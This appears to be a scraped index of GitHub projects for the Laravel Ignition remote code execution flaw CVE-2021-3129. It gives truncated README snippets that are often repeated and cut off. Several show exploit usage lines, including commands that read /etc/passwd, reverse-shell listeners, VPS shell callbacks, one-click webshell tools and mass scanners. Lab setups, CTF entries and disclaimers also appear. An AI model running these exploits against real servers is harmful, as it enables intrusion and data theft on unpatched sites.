CVE-2021-3129

CTF produced for Sourcetoad Q4 2021

Sourcetoad CTF 2021 Produced by @iBotPeaches (Connor Tumbleson), for a Q4 2021 Engineer challenge Originally hosted on CTFdio with a combination of some t3nano instance on AWS Most puzzles were simple indexhtml files leading to assets/images/files Complex puzzles leveraged the services feature of CTFd to deploy a docker image Completed on December 3, 2021 at Sourcetoad w

Exploit example code for CVE-2021-33831

Introduction The application is used for tracking people according to German infection laws to be able to trace Covid-19 infection chains It was created by a student project called iCampus and is used not only at the university in Wildau but also at Cottbus-Senftenberg Around 10000 people are affected Guests of the universities are required to use this application The appl

CVE-2021-3129 POC

Laravel-CVE-2021-3129 CVE-2021-3129 描述 整合githubcom/zhzyker/CVE-2021-3129 、githubcom/SNCKER/CVE-2021-3129 ，本项目拥有以下优点： 保留自定义命令功能 新增利用成功自动退出功能，提高效率 保持了11条利用链 新增更多的escaped_chars，并对命令使用括号处理，减少命令无法执行的概率 安装 pip

Unauthenticated RCE in Laravel Debug Mode <8.4.2

CVE-2021-3129 Yet another exploit for CVE-2021-3129! Made to have more features and reliability Based on pentest-toolscom/blog/exploit-rce-vulnerability-laravel-cve-2021-3129 DISCLAIMER: This script is made to audit the security of systems Only use this script on your own systems or on systems you have written permission to exploit

CVE-2021-3129 POC

Laravel-CVE-2021-3129 CVE-2021-3129 描述 整合githubcom/zhzyker/CVE-2021-3129 、githubcom/SNCKER/CVE-2021-3129 ，本项目拥有以下优点： 保留自定义命令功能 新增利用成功自动退出功能，提高效率 保持了11条利用链 新增更多的escaped_chars，并对命令使用括号处理，减少命令无法执行的概率 安装 pip

call nuclei scan engine with golang

nuclei-plus Allows Golang to call Nuclei directly to get scan results install go get githubcom/randolphcyg/nucleiplus Case: use nuclei-plus scan CVE-2021-3129 cd /opt # clone vulhub git clone githubcom/vulhub/vulhubgit # start CVE-2021-3129 env cd /opt/vulhub/laravel/CVE-2021-3129/ docker-compose build docker-compose up -d #

Laravel RCE CVE-2021-3129

CVE-2021-3129 Laravel RCE CVE-2021-3129 漏洞概述 当Laravel开启了Debug模式时，由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用，攻击者可以通过发起恶意请求，构造恶意Log文件等方式触发Phar反序列化，最终造成远程代码执行。 影响版本 Laravel &lt;= 842 漏洞验证 �

Horizontall - StrAPI - Laravel Synopsis “Horizontall” is marked as easy difficulty machine which features multiple SSH and Nginx service VHOST is enabled on the server and it is running Beta version of StraAPI application and it has multiple vulnerabilities We gain access StrAPI application dashboard via exploiting a bug in access control and then gain shell acce

Laravel debug mode - Remote Code Execution (RCE)

CVE-2021-3129 Laravel debug mode - Remote Code Execution (RCE) cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2021-3129 wwwambionicsio/blog/laravel-debug-rce githubcom/ambionics/phpggc Example python3 exploitpy 127001:8080 python3 exploitpy 127001:8080 --phar $(php -d pharreadonly=off -d phar

Add revert shell

CVE-2021-3129 Laravel &lt;= v842 debug mode: Remote code execution (CVE-2021-3129) Use： python3 exppy 127001:8888 [*] Try to use Laravel/RCE1 for exploitation [+]exploit: [*] Laravel/RCE1 Result: [*] Try to use Laravel/RCE2 for exploitation [+]exploit: [*] Laravel/RCE2 Result: [*] Try to use Laravel/RCE3 for exploitation [+]exploit: [*] Laravel/RCE3 R

evil_ftp 本脚本配合CVE-2021-3129 laravel debug rce食用更佳 运行上述脚本，一个恶意ftp服务就起来了(注释已经很详细了） 这个脚本做的事情很简单，就是当客户端第一次连接的时候返回我们预设的payload 当客户端第二次连接的时候将客户端的连接重定向到127001:9000,也就是我们的php-fpm服务的端�

Laravel debug rce

CVE-2021-3129 Laravel debug rce 食用方法 执行docker-compse up -d启动环境 访问8888端口后点击首页面的generate key就可以复现了 关于docker环境想说的几点： 把envexample复制到env作用是开启debug环境 关闭了phpini的pharreadonly 在resources/view/里添加了一个hello模板并引用了一个未定义变量，同时在routes/web

Ensimag 3A - Exploit on CVE 2021-3129

Dévoir Sécurité 2 - Ensimag 3A Configuration de l'exploit Placez vous à la racine du projet et dans un terminal, lancez : docker-compose build docker-compose up -d docker-compose exec exploit bash Une fois connecté sur le conteneur, lancez : (python3 exploitpy &amp;); nc -lnvp 4444

CVE-2021-3129 | Laravel Debug Mode Vulnerability

CVE-2021-3129 Mass Scan Tools For Laravel &lt;= V842 Debug Mode Remote Code Execution (RCE) | Python Reference Ambionicsio PHPGCC Chain PHPGCC Laravel/RCE1 Laravel/RCE2 Laravel/RCE3 Laravel/RCE4 Laravel/RCE5 Laravel/RCE6 Laravel/RCE7 Monolog/RCE1 Monolog/RCE2 Monolog/RCE3 Monolog/RCE4 Environment Variables In order to run this project, you need to ensure some variabl

Exploit for CVE-2021-3129

CVE-2021-3129_exploit Exploit for CVE-2021-3129 Lab setup: $ git clone githubcom/laravel/laravelgit $ cd laravel $ git checkout e849812 $ composer install $ composer require facade/ignition==251 $ php artisan serve Usage: $ git clone githubcom/nth347/CVE-2021-3129_exploitgit $ cd CVE-2021-3129_exploit $ chmod +x expl

Laravel RCE (CVE-2021-3129)

CVE-2021-3129 Laravel RCE (CVE-2021-3129) Test Environment mkdir CVE-2021-3129-docker cd CVE-2021-3129-docker wget rawgithubusercontentcom/vulhub/vulhub/master/laravel/CVE-2021-3129/docker-composeyml docker compose up -d Usage git clone githubcom/miko550/CVE-2021-3129git cd CVE-2021-3129 pip install -r requirementstx

CVE-2021-3129 Exploit Checker By ./MrMad

Laravel-debug-Checker CVE-2021-3129 Checker By /MrMad Refrence : pentest-toolscom/blog/exploit-rce-vulnerability-laravel-cve-2021-3129 install module python -m pip install -r requirementstxt installation on linux git clone githubcom/MadExploits/Laravel-debug-Checker sudo mv Laravel_debugpy /usr/bin/laravel_debug sudo

CVE-2021-3129 影响范围 Laravel &lt;= 842 Ignition &lt;252 仅供测试与研究使用 仅供测试与研究使用 仅供测试与研究使用 Environment 注意必须放在phpggc的目录下运行,且要有php-cli环境 Usage python3 exppy url vps_ip vps_port 本地测试结果 如下图,在本地wsl中测试,在自己的vps上收到了shell Vulnerability a

laravel-CVE-2021-3129-EXP CVE-2021-3129 一键 getshell 用法 python3 laravel-CVE-2021-3129-EXPpy 127001:8000 成功以后使用哥斯拉链接即可。

PoC for CVE-2021-3129 (Laravel)

CVE-2021-3129 PoC for CVE-2021-3129 (Laravel) For educational purposes only Test Set up the PoC environment $ docker-compose build $ docker-compose up -d Confirm it works See localhost:8000/ and make sure the Laravel default page is shown Exploit $ docker-compose exec attacker sh / # python3 exploitpy

laravel-CVE-2021-3129-EXP CVE-2021-3129 一键 getshell 用法 python3 laravel-CVE-2021-3129-EXPpy 127001:8000 成功以后使用哥斯拉链接即可。

Laravel_CVE-2021-3129_EXP 参考exp: githubcom/SNCKER/CVE-2021-3129 版本要求 Laravel Iginition == 251 通过EXP的本地版本 Laravel 842 注意事项 需要将该exp放置在phpgcc目录下，否则无法调用phpgcc exmaple

Laravel-842-rce-CVE-2021-3129 exploitpy tested use python3,and only working with phpggc first docker-compose up port on 8888 at 127001 generate key first

CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞

CVE-2021-3129 CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞 影响版本及条件 Laravel &lt;= 842 Ignition &lt;252 环境搭建 docker pull vulhub/laravel:842 exp使用 在exploitpy同目录下下载执行 git clone githubcom/ambionics/phpggcgit python3 exploitpy 127001:80 "whoami"

Laravel Debug mode RCE漏洞（CVE-2021-3129）poc / exp

Laravel Debug mode RCE漏洞（CVE-2021-3129）poc / exp CVE-2021-3129 exp / poc 注意⚠️：因该漏洞利用与检测会发送多次请求，可能导致利用与检测过程缓慢 usage: python CVE-2021-3129py usage: python CVE-2021-3129py -u [url] --exp Laravel Debug mode RCE（CVE-2021-3129）POC &amp; EXP optional arguments: -h, --help show th

CVE-2021-3129 影响范围 Laravel &lt;= 842 Ignition &lt;252 仅供测试与研究使用 仅供测试与研究使用 仅供测试与研究使用 Environment 注意必须放在phpggc的目录下运行,且要有php-cli环境 Usage python3 exppy url vps_ip vps_port 本地测试结果 如下图,在本地wsl中测试,在自己的vps上收到了shell Vulnerability a

Exploit for CVE-2021-3129

CVE-2021-3129_exploit Exploit for CVE-2021-3129 Lab setup: $ git clone githubcom/laravel/laravelgit $ cd laravel $ git checkout e849812 $ composer install $ composer require facade/ignition==251 $ php artisan serve Usage: $ git clone githubcom/nth347/CVE-2021-3129_exploitgit $ cd CVE-2021-3129_exploit $ chmod +x expl

Tools-collection 放一些网上收集到的工具（不常见）。 Laravel\CVE-2021-3129-main：githubcom/zhzyker/CVE-2021-3129/ xxl-job-rce：githubcom/mrknow001/xxl-job-rce 若依系统漏洞利用：githubcom/thelostworldFree/Ruoyi-All

Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)

CVE-2021-3129 Laravel &lt;= v842 debug mode: Remote code execution (CVE-2021-3129) 修改了@crisprss师傅的 githubcom/crisprss/Laravel_CVE-2021-3129_EXP 增加了更多可用的 gadget 用于遍历 Use： python3 exppy 127001:8888 效果： zhzy@debian:/opt/tools/vuln/laravel/CVE-2021-3129/phpggc$ python3 exp

用来记录学习的一些漏洞。 CMS laravel debug rce CVE-2021-3129 xyhcms前台反序列化

CVE-2021-3129-Laravel Debug mode

CVE-2021-3129 生成自定义命令的phar包： php -d'pharreadonly=0' /phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w0 php -a 进入php命令行环境 $fp = fopen('php://output', 'w'); stream_filter_append($fp, 'convertquoted-printable-encode'); $size = ""; fwrite($fp, iconv(

WriteUp Horizontall Horizontall es una máquina Linux de fácil dificultad donde solo están expuestos los servicios HTTP y SSH&nbsp;La enumeración del sitio web revela que está construido utilizando el marco Vue JS&nbsp;Al revisar el código fuente del archivo Javascript, se descubre un nuevo host virtual&nbsp;Este host cont

Exploit for CVE-2021-3129

laravel-exploits Exploit for CVE-2021-3129 Details: wwwambionicsio/blog/laravel-debug-rce Usage $ php -d'pharreadonly=0' /phpggc --phar phar -o /tmp/exploitphar --fast-destruct monolog/rce1 system id $ /laravel-ignition-rcepy localhost:8000/ /tmp/exploitphar Log file: /work/pentest/laravel/laravel/storage/logs/laravellog Logs cleared Successfu

CVE-2021-3129

CVE-2021-3129 使用说明： 注：本地需有php环境 python3 CVE-2021-3129py -u 127001:80 （只检测poc） python3 CVE-2021-3129py -u 127001:80 -c whoami （命令执行，默认会遍历所有利用链） python3 CVE-2021-3129py -u 127001:80 -c whoami -chain laravel/rce1 （如检测到可用利用链可直接选择利用）

A Vulnerable and Exploitable version of UniShare Project

UniXploit A Vulnerable and Exploitable version of UniShare Project, built with Laravel 8 Description Actually, this project is used for the final task of the Software Testing and Web Programming course, but I set this project to test CVE-2019-3129 So this project is an archive of Laravel version 8 which is vulnerable to RCE CVE-2021-3129: in early 2021, Laravel had a vulnera

Laravel RCE (CVE-2021-3129)

CVE-2021-3129 - Laravel RCE About The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability This script allows you to write/execute commands on a website running Laravel &lt;= v842, that has "APP_DEBUG" set to "true" in its "env" file It currently has support for searching the log file, executing commands, writi

Mass Scanner for CVE-2021-3129 Laravel Debug RCE Usage $ bash massCVE-2021-3129scansh listtxt

Mass Scanner for CVE-2021-3129 Laravel Debug RCE Usage $ bash massCVE-2021-3129scansh listtxt

CVE-2021-3129_exploit Exploit for CVE-2021-3129 Lab setup: $ git clone githubcom/laravel/laravelgit $ cd laravel $ git checkout e849812 $ composer install $ composer require facade/ignition==251 $ php artisan serve Usage: $ git clone githubcom/nth347/CVE-2021-3129_exploitgit $ cd CVE-2021-3129_exploit $ chmod +x expl

Todo Laravel Fingerprint Laravel Leak env Laravel Debug Mode Laravel CVE-2018-15133 Laravel Ignition CVE-2021-3129 Insecure Deserialization with APP_KEY leaked Interactive mode Install Clone repo and dependency git clone githubcom/carlosevieira/larasploit cd larasploit pip3 install -r requirementstxt Run python3

Laravel Automated Vulnerability Scanner

Todo Laravel Fingerprint Laravel Leak env Laravel Debug Mode Laravel CVE-2018-15133 Laravel Ignition CVE-2021-3129 Insecure Deserialization with APP_KEY leaked Interactive mode Install Clone repo and dependency git clone githubcom/carlosevieira/larasploit cd larasploit pip3 install -r requirementstxt Run python3

Todo Laravel Fingerprint Laravel Leak env Laravel Debug Mode Laravel CVE-2018-15133 Laravel Ignition CVE-2021-3129 Insecure Deserialization with APP_KEY leaked Interactive mode Install Clone repo and dependency git clone githubcom/carlosevieira/larasploit cd larasploit pip3 install -r requirementstxt Run python3